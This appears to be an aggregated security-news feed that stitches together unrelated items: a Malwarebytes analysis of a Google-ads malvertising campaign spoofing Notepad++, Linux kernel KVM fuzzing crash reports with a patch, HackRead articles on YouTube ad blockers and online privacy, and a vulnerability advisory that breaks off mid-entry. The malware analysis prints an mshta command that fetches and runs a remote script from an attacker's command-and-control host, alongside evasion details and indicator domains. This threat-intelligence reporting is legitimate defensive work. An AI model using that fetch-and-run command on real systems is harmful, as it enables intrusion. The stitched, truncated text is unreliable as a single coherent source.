Categories: Threat Intelligence
Tags: malvertising

Tags: ads

Tags: notepad

Tags: hta

Tags: malware

Tags: google

A sophisticated threat actor has been using Google ads to deliver custom malware payloads to victims for months while flying under the radar.



(Read more...)




The post The forgotten malvertising campaign appeared first on Malwarebytes Labs.

In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.

**Malicious ads for Notepad++**

The threat actor is running a campaign targeting Notepad++, a popular text editor for Windows as well as similar software programs such as PDF converters. The image below is a collage of malicious ads we observed recently, all run by the same threat actor but via different ad accounts, likely compromised.

A first level of filtering happens when the user clicks on one of these ads. This is likely an IP check that discards VPNs and other non genuine IP addresses and instead shows a decoy site:

However, intended targets will see a replica of the real Notepad++ website hosted at notepadxtreme\[.\]com:

**Fingerprinting for VM detection**

A second level of filtering happens when the user clicks on the download link where JavaScript code performs a system fingerprint. We had previously observed some malvertising campaigns check for the presence of emulators or virtual machines and this is what happens here also, although the code being used is different and more complex.

If any of the checks don't match, the user is being redirected to the legitimate Notepad++ website. Each potential victim is assigned a unique ID that will allow them to download the payload.

**Custom, time-sensitive download**

Another thing that sets apart this campaign from others is the way the payload is being downloaded. Each user is given a unique ID with the following format:

CukS1=\[10 character string\]\[13 digits\]

This is likely for tracking purposes but also to make each download unique and time sensitive.

Unlike other malvertising campaigns the payload is a _.hta_ script. It follows the same naming convention seen above with the download URL:

Notepad\_Ver\_\[10 character string\]\[13 digits\].hta

Attempting to download the file again from the same URL results in an error:

**.HTA Payload**

The .hta file we captured during our investigation was not fully weaponized. However, we were able to find another one that was uploaded to VirusTotal in early July. It uses the same naming convention and we can see the lure was "PDF Converter" instead of Notepad++.

The script is well obfuscated and shows 0 detection on VirusTotal. However, upon dynamic analysis, there is a connection to a remote domain (mybigeye\[.\]icu) on a custom port:

C:\\Windows\\SysWOW64\\mshta.exe "C:\\Windows\\System32\\mshta.exe"   
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client\_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

We also notice it uses the same client\_id stored in the filename when making that remote connection.

While we don't know what happens next, we believe this is part of malicious infrastructure used by threat actors to gain access to victims' machines using tools such as Cobalt Strike.

**Innovation makes malvertising a greater threat**

We have observed an increase in the volume of malvertising campaigns but also in their sophistication over the past several months. Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims.

With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads. This is another space where we see some innovation and where security vendors are currently running behind.

Threat intelligence is a critical part of a defensive strategy to better understand the threat landscape in order to protect users. For example, tracking malicious ads allows us to quickly identify the infrastructure used by threat actors and immediately block it. Following the malware delivery chain shows us any new techniques that may bypass current security products and helps us to adjust our detections accordingly.

**Indicators of Compromise**

Ad domains:

switcodes\[.\]com  
karelisweb\[.\]com  
jquerywins\[.\]com  
mojenyc\[.\]com

Fake Notepad++ site:

notepadxtreme\[.\]com

Script C2:

mybigeye\[.\]icu

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The forgotten malvertising campaign

extract_user_to_sg in lib/scatterlist.c in the Linux kernel before 6.4.2 fails to unpin pages in a certain situation, as demonstrated by a WARNING for try_grab_page.

Hello,

When using Healer to fuzz the Linux kernel, the following crash  
was triggered on:

HEAD commit: fdf0eaf11452d72945af31804e2a1048ee1b574c (tag: v6.5-rc2)

git tree: upstream

I tried to reproduce this bug on v6.5-rc3(HEAD commit:  
6eaae198076080886b9e7d57f4ae06fa782f90ef), it still exists.

console output:  
https://drive.google.com/file/d/1Lq71bFwtEDix82PEf\_193CLG6uh1Pjj9/view?usp=drive\_link  
kernel config: https://drive.google.com/file/d/1dApy7OR4KDYdhF96ZUowZQ1r-uLYTd-0/view?usp=drive\_link  
C reproducer: https://drive.google.com/file/d/1Dkj31wwYP7p-AEJeemD3yrIUr7-VdBqF/view?usp=drive\_link  
Syzlang reproducer:  
https://drive.google.com/file/d/1ib6zTs4srKI1RnUcHG3mSZ5HeW7rZhnd/view?usp=drive\_link

If you fix this issue, please add the following tag to the commit:  
Reported-by: Yikebaer Aizezi <yikebaer61@gmail.com>

WARNING: CPU: 0 PID: 10232 at mm/gup.c:229 try\_grab\_page+0x2dd/0x3a0  
mm/gup.c:229  
Modules linked in:  
CPU: 0 PID: 10232 Comm: syz-executor Tainted: G B 6.5.0-rc2 #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014  
RIP: 0010:try\_grab\_page+0x2dd/0x3a0 mm/gup.c:229  
Code: ff be 04 00 00 00 4c 89 e7 e8 cf fa 13 00 f0 41 ff 04 24 e8 65  
96 cb ff 45 31 e4 5b 44 89 e0 5d 41 5c 41 5d c3 e8 53 96 cb ff <0f> 0b  
e8 4c 96 cb ff 41 bc f4 ff ff ff 5b 44 89 e0 5d 41 5c 41 5d  
RSP: 0018:ffffc9000e99f268 EFLAGS: 00010202  
RAX: 0000000000002f80 RBX: ffffea00003ae340 RCX: ffffc90002d79000  
RDX: 0000000000040000 RSI: ffffffff81ad81ed RDI: ffffea00003ae374  
RBP: ffffea00003ae340 R08: 0000000000000000 R09: fffff94000075c6e  
R10: ffffea00003ae377 R11: 0000000000000000 R12: ffffea00003ae374  
R13: 0000000000210052 R14: ffffea00003ae340 R15: 000000000eb8d225  
FS: 00007fc6339a4640(0000) GS:ffff888063e00000(0000) knlGS:0000000000000000  
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 0000000000000000 CR3: 000000002c3ea000 CR4: 0000000000752ef0  
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  
PKRU: 55555554  
Call Trace:  
<TASK>  
follow\_page\_pte+0x18c/0x1610 mm/gup.c:651  
follow\_pmd\_mask mm/gup.c:727 \[inline\]  
follow\_pud\_mask mm/gup.c:765 \[inline\]  
follow\_p4d\_mask mm/gup.c:782 \[inline\]  
follow\_page\_mask+0x2e4/0xbd0 mm/gup.c:839  
\_\_get\_user\_pages+0x3fa/0xcf0 mm/gup.c:1256  
\_\_get\_user\_pages\_locked mm/gup.c:1487 \[inline\]  
get\_user\_pages\_unlocked+0x183/0x580 mm/gup.c:2387  
hva\_to\_pfn\_slow arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2536 \[inline\]  
hva\_to\_pfn+0x198/0xbc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2674  
\_\_gfn\_to\_pfn\_memslot+0x202/0x3e0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2736  
\_\_kvm\_faultin\_pfn arch/x86/kvm/mmu/mmu.c:4329 \[inline\]  
kvm\_faultin\_pfn+0x21b/0x12d0 arch/x86/kvm/mmu/mmu.c:4365  
kvm\_tdp\_mmu\_page\_fault arch/x86/kvm/mmu/mmu.c:4503 \[inline\]  
kvm\_tdp\_page\_fault+0x167/0x4d0 arch/x86/kvm/mmu/mmu.c:4549  
kvm\_mmu\_do\_page\_fault arch/x86/kvm/mmu/mmu\_internal.h:320 \[inline\]  
kvm\_mmu\_page\_fault+0x2f4/0x1a40 arch/x86/kvm/mmu/mmu.c:5756  
handle\_ept\_violation+0x20a/0x620 arch/x86/kvm/vmx/vmx.c:5760  
\_\_vmx\_handle\_exit arch/x86/kvm/vmx/vmx.c:6539 \[inline\]  
vmx\_handle\_exit+0x4a1/0x18d0 arch/x86/kvm/vmx/vmx.c:6556  
vcpu\_enter\_guest arch/x86/kvm/x86.c:10848 \[inline\]  
vcpu\_run+0x24b6/0x44b0 arch/x86/kvm/x86.c:10951  
kvm\_arch\_vcpu\_ioctl\_run+0x416/0x1830 arch/x86/kvm/x86.c:11172  
kvm\_vcpu\_ioctl+0x4de/0xcc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:4112  
vfs\_ioctl fs/ioctl.c:51 \[inline\]  
\_\_do\_sys\_ioctl fs/ioctl.c:870 \[inline\]  
\_\_se\_sys\_ioctl fs/ioctl.c:856 \[inline\]  
\_\_x64\_sys\_ioctl+0x173/0x1e0 fs/ioctl.c:856  
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x47959d  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b4 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fc6339a4068 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 000000000059c0a0 RCX: 000000000047959d  
RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000006  
RBP: 000000000059c0a0 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000059c0ac  
R13: 000000000000000b R14: 0000000000437250 R15: 00007fc633984000  
</TASK>

Modules linked in:  
CPU: 0 PID: 10232 Comm: syz-executor Tainted: G B 6.5.0-rc2 #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014  
RIP: 0010:try\_grab\_page+0x2dd/0x3a0 mm/gup.c:229  
Code: ff be 04 00 00 00 4c 89 e7 e8 cf fa 13 00 f0 41 ff 04 24 e8 65  
96 cb ff 45 31 e4 5b 44 89 e0 5d 41 5c 41 5d c3 e8 53 96 cb ff <0f> 0b  
e8 4c 96 cb ff 41 bc f4 ff ff ff 5b 44 89 e0 5d 41 5c 41 5d  
RSP: 0018:ffffc9000e99f268 EFLAGS: 00010202  
RAX: 0000000000002f80 RBX: ffffea00003ae340 RCX: ffffc90002d79000  
RDX: 0000000000040000 RSI: ffffffff81ad81ed RDI: ffffea00003ae374  
RBP: ffffea00003ae340 R08: 0000000000000000 R09: fffff94000075c6e  
R10: ffffea00003ae377 R11: 0000000000000000 R12: ffffea00003ae374  
R13: 0000000000210052 R14: ffffea00003ae340 R15: 000000000eb8d225  
FS: 00007fc6339a4640(0000) GS:ffff888063e00000(0000) knlGS:0000000000000000  
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 0000000000000000 CR3: 000000002c3ea000 CR4: 0000000000752ef0  
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  
PKRU: 55555554  
Call Trace:  
<TASK>  
follow\_page\_pte+0x18c/0x1610 mm/gup.c:651  
follow\_pmd\_mask mm/gup.c:727 \[inline\]  
follow\_pud\_mask mm/gup.c:765 \[inline\]  
follow\_p4d\_mask mm/gup.c:782 \[inline\]  
follow\_page\_mask+0x2e4/0xbd0 mm/gup.c:839  
\_\_get\_user\_pages+0x3fa/0xcf0 mm/gup.c:1256  
\_\_get\_user\_pages\_locked mm/gup.c:1487 \[inline\]  
get\_user\_pages\_unlocked+0x183/0x580 mm/gup.c:2387  
hva\_to\_pfn\_slow arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2536 \[inline\]  
hva\_to\_pfn+0x198/0xbc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2674  
\_\_gfn\_to\_pfn\_memslot+0x202/0x3e0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2736  
\_\_kvm\_faultin\_pfn arch/x86/kvm/mmu/mmu.c:4329 \[inline\]  
kvm\_faultin\_pfn+0x21b/0x12d0 arch/x86/kvm/mmu/mmu.c:4365  
kvm\_tdp\_mmu\_page\_fault arch/x86/kvm/mmu/mmu.c:4503 \[inline\]  
kvm\_tdp\_page\_fault+0x167/0x4d0 arch/x86/kvm/mmu/mmu.c:4549  
kvm\_mmu\_do\_page\_fault arch/x86/kvm/mmu/mmu\_internal.h:320 \[inline\]  
kvm\_mmu\_page\_fault+0x2f4/0x1a40 arch/x86/kvm/mmu/mmu.c:5756  
handle\_ept\_violation+0x20a/0x620 arch/x86/kvm/vmx/vmx.c:5760  
\_\_vmx\_handle\_exit arch/x86/kvm/vmx/vmx.c:6539 \[inline\]  
vmx\_handle\_exit+0x4a1/0x18d0 arch/x86/kvm/vmx/vmx.c:6556  
vcpu\_enter\_guest arch/x86/kvm/x86.c:10848 \[inline\]  
vcpu\_run+0x24b6/0x44b0 arch/x86/kvm/x86.c:10951  
kvm\_arch\_vcpu\_ioctl\_run+0x416/0x1830 arch/x86/kvm/x86.c:11172  
kvm\_vcpu\_ioctl+0x4de/0xcc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:4112  
vfs\_ioctl fs/ioctl.c:51 \[inline\]  
\_\_do\_sys\_ioctl fs/ioctl.c:870 \[inline\]  
\_\_se\_sys\_ioctl fs/ioctl.c:856 \[inline\]  
\_\_x64\_sys\_ioctl+0x173/0x1e0 fs/ioctl.c:856  
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x47959d  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b4 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fc6339a4068 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 000000000059c0a0 RCX: 000000000047959d  
RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000006  
RBP: 000000000059c0a0 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000059c0ac  
R13: 000000000000000b R14: 0000000000437250 R15: 00007fc633984000  
</TASK>  
Kernel panic - not syncing: kernel: panic\_on\_warn set ...  
CPU: 0 PID: 10232 Comm: syz-executor Tainted: G B 6.5.0-rc2 #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014  
Call Trace:  
<TASK>  
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]  
dump\_stack\_lvl+0x92/0xf0 lib/dump\_stack.c:106  
panic+0x570/0x620 kernel/panic.c:340  
check\_panic\_on\_warn+0x8e/0x90 kernel/panic.c:236  
\_\_warn+0xee/0x340 kernel/panic.c:673  
\_\_report\_bug lib/bug.c:199 \[inline\]  
report\_bug+0x25d/0x460 lib/bug.c:219  
handle\_bug+0x3c/0x70 arch/x86/kernel/traps.c:324  
exc\_invalid\_op+0x14/0x40 arch/x86/kernel/traps.c:345  
asm\_exc\_invalid\_op+0x16/0x20 arch/x86/include/asm/idtentry.h:568  
RIP: 0010:try\_grab\_page+0x2dd/0x3a0 mm/gup.c:229  
Code: ff be 04 00 00 00 4c 89 e7 e8 cf fa 13 00 f0 41 ff 04 24 e8 65  
96 cb ff 45 31 e4 5b 44 89 e0 5d 41 5c 41 5d c3 e8 53 96 cb ff <0f> 0b  
e8 4c 96 cb ff 41 bc f4 ff ff ff 5b 44 89 e0 5d 41 5c 41 5d  
RSP: 0018:ffffc9000e99f268 EFLAGS: 00010202  
RAX: 0000000000002f80 RBX: ffffea00003ae340 RCX: ffffc90002d79000  
RDX: 0000000000040000 RSI: ffffffff81ad81ed RDI: ffffea00003ae374  
RBP: ffffea00003ae340 R08: 0000000000000000 R09: fffff94000075c6e  
R10: ffffea00003ae377 R11: 0000000000000000 R12: ffffea00003ae374  
R13: 0000000000210052 R14: ffffea00003ae340 R15: 000000000eb8d225  
follow\_page\_pte+0x18c/0x1610 mm/gup.c:651  
follow\_pmd\_mask mm/gup.c:727 \[inline\]  
follow\_pud\_mask mm/gup.c:765 \[inline\]  
follow\_p4d\_mask mm/gup.c:782 \[inline\]  
follow\_page\_mask+0x2e4/0xbd0 mm/gup.c:839  
\_\_get\_user\_pages+0x3fa/0xcf0 mm/gup.c:1256  
\_\_get\_user\_pages\_locked mm/gup.c:1487 \[inline\]  
get\_user\_pages\_unlocked+0x183/0x580 mm/gup.c:2387  
hva\_to\_pfn\_slow arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2536 \[inline\]  
hva\_to\_pfn+0x198/0xbc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2674  
\_\_gfn\_to\_pfn\_memslot+0x202/0x3e0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2736  
\_\_kvm\_faultin\_pfn arch/x86/kvm/mmu/mmu.c:4329 \[inline\]  
kvm\_faultin\_pfn+0x21b/0x12d0 arch/x86/kvm/mmu/mmu.c:4365  
kvm\_tdp\_mmu\_page\_fault arch/x86/kvm/mmu/mmu.c:4503 \[inline\]  
kvm\_tdp\_page\_fault+0x167/0x4d0 arch/x86/kvm/mmu/mmu.c:4549  
kvm\_mmu\_do\_page\_fault arch/x86/kvm/mmu/mmu\_internal.h:320 \[inline\]  
kvm\_mmu\_page\_fault+0x2f4/0x1a40 arch/x86/kvm/mmu/mmu.c:5756  
handle\_ept\_violation+0x20a/0x620 arch/x86/kvm/vmx/vmx.c:5760  
\_\_vmx\_handle\_exit arch/x86/kvm/vmx/vmx.c:6539 \[inline\]  
vmx\_handle\_exit+0x4a1/0x18d0 arch/x86/kvm/vmx/vmx.c:6556  
vcpu\_enter\_guest arch/x86/kvm/x86.c:10848 \[inline\]  
vcpu\_run+0x24b6/0x44b0 arch/x86/kvm/x86.c:10951  
kvm\_arch\_vcpu\_ioctl\_run+0x416/0x1830 arch/x86/kvm/x86.c:11172  
kvm\_vcpu\_ioctl+0x4de/0xcc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:4112  
vfs\_ioctl fs/ioctl.c:51 \[inline\]  
\_\_do\_sys\_ioctl fs/ioctl.c:870 \[inline\]  
\_\_se\_sys\_ioctl fs/ioctl.c:856 \[inline\]  
\_\_x64\_sys\_ioctl+0x173/0x1e0 fs/ioctl.c:856  
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x47959d  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b4 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fc6339a4068 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 000000000059c0a0 RCX: 000000000047959d  
RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000006  
RBP: 000000000059c0a0 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000059c0ac  
R13: 000000000000000b R14: 0000000000437250 R15: 00007fc633984000  
</TASK>  
Dumping ftrace buffer:  
(ftrace buffer empty)  
Kernel Offset: disabled  
Rebooting in 1 seconds..

CVE-2023-40791: LKML: Yikebaer Aizezi: WARNING in try_grab_page

** DISPUTED ** An issue was discovered in the Linux kernel through 6.5.7. kvm_arch_vcpu_ioctl_run in arch/x86/kvm/x86.c allows a WARN_ON_ONCE if userspace stuffs a nonsensical vCPU state.

Messages in this thread

*   First message in thread
*   Yikebaer Aizezi
    *   Sean Christopherson
        *   Yikebaer Aizezi

Patch in this message

*   Get diff 1

Date

Thu, 3 Aug 2023 20:46:35 +0000

Subject

Re: WARNING in kvm\_arch\_vcpu\_ioctl\_run

From

On Thu, Jul 27, 2023, Yikebaer Aizezi wrote:  
\> Hello, I'm sorry for the mistake in my previous email. I forgot to add  
\> a subject. This is my second attempt to send the message.  
\>   
\> When using Healer to fuzz the latest Linux kernel, the following crash  
\> was triggered.  
\>   
\> HEAD commit: fdf0eaf11452d72945af31804e2a1048ee1b574c (tag: v6.5-rc2)  
\>   
\> git tree: upstream  
\>   
\> console output:  
\> https://drive.google.com/file/d/1FiemC\_AWRT-6EGscpQJZNzYhXZty6BVr/view?usp=drive\_link  
\> kernel config: https://drive.google.com/file/d/1fgPLKOw7QbKzhK6ya5KUyKyFhumQgunw/view?usp=drive\_link  
\> C reproducer: https://drive.google.com/file/d/1SiLpYTZ7Du39ubgf1k1BIPlu9ZvMjiWZ/view?usp=drive\_link  
\> Syzlang reproducer:  
\> https://drive.google.com/file/d/1eWSmwvNGOlZNU-0-xsKhUgZ4WG2VLZL5/view?usp=drive\_link  
\> Similar report:  
\> https://groups.google.com/g/syzkaller-bugs/c/C2ud-S1Thh0/m/z4iI7l\_dAgAJ  
\>   
\> If you fix this issue, please add the following tag to the commit:  
\> Reported-by: Yikebaer Aizezi <yikebaer61@gmail.com>  
\>   
\> kvm: vcpu 129: requested lapic timer restore with starting count  
\> register 0x390=4241646265 (4241646265 ns) > initial count (296265111  
\> ns). Using initial count to start timer.  
\> ------------\[ cut here \]------------  
\> WARNING: CPU: 0 PID: 1977 at arch/x86/kvm/x86.c:11098  
\> kvm\_arch\_vcpu\_ioctl\_run+0x152f/0x1830 arch/x86/kvm/x86.c:11098

Well that's annoying.  The WARN is a sanity check that KVM doesn't somehow put  
the guest into an uninitialized state while emulating the guest's APIC timer, but  
I completely overlooked the fact that userspace can simply stuff the should-be-  
impossible guest state. \*sigh\*

Sadly, I think the most reasonable thing to do is to simply drop the sanity check :-(

diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c  
index 0145d844283b..e9e262b244b8 100644  
\--- a/arch/x86/kvm/x86.c  
+++ b/arch/x86/kvm/x86.c  
@@ -11091,12 +11091,17 @@ int kvm\_arch\_vcpu\_ioctl\_run(struct kvm\_vcpu \*vcpu)  
                        r = -EINTR;  
                        goto out;  
                }  
+  
                /\*  
\-                \* It should be impossible for the hypervisor timer to be in  
\-                \* use before KVM has ever run the vCPU.  
\+                \* Don't bother switching APIC timer emulation from the  
\+                \* hypervisor timer to the software timer, the only way for the  
\+                \* APIC timer to be active is if userspace stuffed vCPU state,  
\+                \* i.e. put the vCPU and into a nonsensical state.  The only  
\+                \* transition out of UNINITIALIZED (without more state stuffing  
\+                \* from userspace) is an INIT, which will reset the local APIC  
\+                \* and thus smother the timer anyways, i.e. APIC timer IRQs  
\+                \* will be dropped no matter what.  
                 \*/  
\-               WARN\_ON\_ONCE(kvm\_lapic\_hv\_timer\_in\_use(vcpu));  
\-  
                kvm\_vcpu\_srcu\_read\_unlock(vcpu);  
                kvm\_vcpu\_block(vcpu);  
                kvm\_vcpu\_srcu\_read\_lock(vcpu);

CVE-2023-40790: LKML: Sean Christopherson: Re: WARNING in kvm_arch_vcpu_ioctl_run

By Waqas
Using YouTube? You might need to disable your ad blocker or whitelist YouTube.com.
This is a post from HackRead.com Read the original post: YouTube Takes on Ad Blockers with Warning Pop-Ups

YouTube has been actively displaying pop-up warnings to users who have ad blockers installed on their browsers, urging them to disable them.

YouTube has recently started showing a pop-up message to users using ad blockers, warning them that ad blockers are not allowed on YouTube and asking them to either disable their ad blocker or subscribe to YouTube Premium.

This is a significant change for YouTube, as it has previously allowed users to use ad blockers without any restrictions. However, YouTube is facing increasing competition from other video streaming platforms, such as Netflix and Hulu, which are all ad-free. In order to remain competitive, YouTube needs to find ways to increase its revenue, and cracking down on ad blockers is one way to do that.

Screenshot of the message displayed by YouTube to encourage users to disable ad blockers on YouTube (Screenshot credit: Hackread.com)

It’s worth noting that the United States CISA (Cybersecurity and Infrastructure Security Agency) **strongly recommends** that users use ad blockers on their web browsers as a precautionary measure against ‘**malvertising**.’

The decision to show the ad blocker pop-up has been met with mixed reactions from users. Some users are frustrated that YouTube is trying to prevent them from using ad blockers, while others understand that YouTube needs to make money in order to keep operating.

It is important to note that YouTube’s terms of service do not allow users to use ad blockers. However, there are many popular ad blockers that still work on YouTube. It is possible that YouTube will continue to crack down on ad blockers in the future, but for now, users can still use them to block ads on YouTube.

****What does this mean for users?****

If you are a YouTube user who uses an ad blocker, you will now see a pop-up message when you try to watch a video. The pop-up message will give you the option to disable your ad blocker or subscribe to YouTube Premium.

If you choose to disable your ad blocker, you will be able to watch videos without seeing any ads. However, if you choose to keep your ad blocker enabled, you can only watch three videos before you are blocked from watching any more videos.

****What can users do?****

There are a few things that users can do about the YouTube ad blocker pop-up:

*   **Disable your ad blocker for YouTube.** If you don’t mind seeing ads, you can disable your ad blocker for YouTube. To do this, simply click on the ad blocker icon in your browser and select the option to disable it for YouTube.
*   **Use a different ad blocker.** There are many different ad blockers available, so if one ad blocker is not working on YouTube, you can try using another one.
*   **Subscribe to YouTube Premium.** If you want to watch videos without ads, you can subscribe to YouTube Premium. YouTube Premium also offers other benefits, such as the ability to download videos and play them in the background.
*   **Ignore the pop-up.** You can also simply ignore the pop-up and continue using YouTube with your ad blocker enabled. However, YouTube may eventually start blocking users from watching videos if they continue to use ad blockers.

****Here’s how to allow ads on YouTube videos****

Like any other website, you can add YouTube.com to your allowlist. Here’s how to do it on AdBlock, Adblock Plus, uBlock Origin, and other ad blockers:

The trend of pay-and-use services is on the rise, particularly following Elon Musk’s significant actions on Twitter (Now X). He introduced a new process for obtaining a verification badge, available to those willing to pay. Musk also restricted various features, such as 2FA, DMs, and tweet editing, to a limited user group.

Meanwhile, Facebook is **actively developing** a paid subscription service for Facebook and Instagram, which would offer users a blue checkmark for a monthly fee. It remains uncertain whether META, Facebook’s parent company, will also curtail free features for paid users or maintain the current access for all.

1.  Google may limit ad blockers for Chrome users
2.  The Pirate Bay: We mine Monero from your CPU, install Adblocker or leave
3.  Clones of popular Ad blockers caught ad frauding millions of Chrome users

YouTube Takes on Ad Blockers with Warning Pop-Ups

By Owais Sultan
Believe it or not, the internet is now over half a century old. Of course, it has really…
This is a post from HackRead.com Read the original post: Is It Possible to Delete Yourself From the Internet Altogether?

Believe it or not, the internet is now over half a century old. Of course, it has really come in leaps and bounds in the last few decades, with **technological advances** and innovations making global communication easier than ever.

The explosion of apps, social media platforms and e-commerce portals that this has instigated has encouraged us to part with more and more of our personal information… but it appears that we may have finally reached a tipping point in this regard. In **a recent survey**, over 80% of respondents said they were concerned about how their online data is used by others.

For that reason, an increasing number of internet users are contemplating extricating themselves from the World Wide Web altogether. But is such a thing even possible? We’ll investigate the topic in greater detail below.

****Can you delete yourself from the internet?****

Technically speaking, it’s not possible to remove all traces of yourself and your online activity from the internet with 100% certainty. That’s because most people have been interacting with the net on a daily basis for many years and over this time, they have created an extensive digital footprint which it’s extremely challenging to eradicate.

Having said that, there are plenty of steps you can take to reduce your online exposure and limit the amount of personal information that is shared with others online. This will reduce the likelihood of unwanted outcomes, such as spam messages, unsolicited robocalls and targeted ads, as well as more concerning eventualities such as fraud, identity theft and scams.

****How can I remove existing traces of personal information?****

Every time you’ve ever interacted with a website, app or digital service provider – and that includes everything from making an e-commerce purchase to signing up for an email newsletter to posting content on social media platforms – you’ve (perhaps inadvertently, perhaps intentionally) shared information about yourself with the world. 

To start, you can **remove your personal info from Google Search** and then go through other steps such as opting out of data brokerage agreements, contacting individual service providers to request the removal of your data and deleting any old or obsolete accounts that you no longer use. This can take a significant investment of time and effort, though there are third-party companies which will lend you their expertise for a nominal fee.

****Is it possible to use the internet anonymously in the future?****

So now that you’ve cleaned up your online presence as best as possible, can you continue using the internet without leaving further footprints? Yes and no. While your online activity can always be logged in some regard, you can alter your approach to minimize the amount of personal information you leave behind going forward.

This will involve such steps as installing and activating a **VPN** on your device to mask its location and encrypt all information sent using it, as well as refraining from logging on to public Wi-Fi networks and using browsers which offer greater protection. You can also tweak the privacy settings on your accounts to maintain control of your data more comprehensively.

Given the nature of the beast, it’s all but impossible to remove yourself from the internet altogether. However, with an investment of time, effort and perhaps money, you can reduce your online presence quite substantially.

1.  What Are Dark Web Search Engines and How to Find Them?
2.  The Types of Phishing Attacks and How to Dodge All of Them
3.  How to Obtain a Virtual Phone Number and Why You Need One

Is It Possible to Delete Yourself From the Internet Altogether?

IBM QRadar SIEM 7.5.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  IBM X-Force ID:  254138

**CVEID:**   CVE-2023-34981  
**DESCRIPTION:**   Apache Tomcat could allow a remote attacker to obtain sensitive information, caused by a flaw when a response did not have any HTTP headers set. By sending a specially crafted HTTP request, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258638 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-25147  
